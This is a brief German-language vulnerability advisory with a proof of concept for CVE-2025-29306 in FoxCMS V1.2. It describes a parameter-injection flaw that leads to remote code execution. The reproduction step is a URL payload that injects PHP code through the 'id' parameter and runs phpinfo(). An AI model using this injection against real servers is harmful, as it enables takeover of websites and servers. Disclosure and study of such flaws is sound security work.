
Proof-of-Concept-Exploit für CVE-2025-29306, eine Server-Parameter-Injection-Sicherheitslücke in FoxCMS V1.2, die eine Remotecodeausführung über manipulierte HTTP-Anfragen ermöglicht.
Service-Parameter-Injection-Schwachstelle im FOXCMS Qianhu Content Management System
I. Einführung in die Schwachstelle
FoxCMS ist ein kostenlos kommerziell nutzbares und Open-Source-Website-Management-System, das auf PHP+MySQL basiert. Das FOXCMS Qianhu Content Management System weist eine Service-Parameter-Injection-Schwachstelle auf, die es Angreifern ermöglicht, die Kontrolle über den Server zu erlangen.
II. Betroffene Versionen
FOXCMS Qianhu Content Management System V1.2
III. Reproduktionsschritte
POC: http://xx/images/index.html?id=%24{%40print(phpinfo())} Geben Sie den POC ein, um die anfällige Seite aufzurufen. Es werden die Informationen nach der Ausführung des phpinfo-Befehls angezeigt.
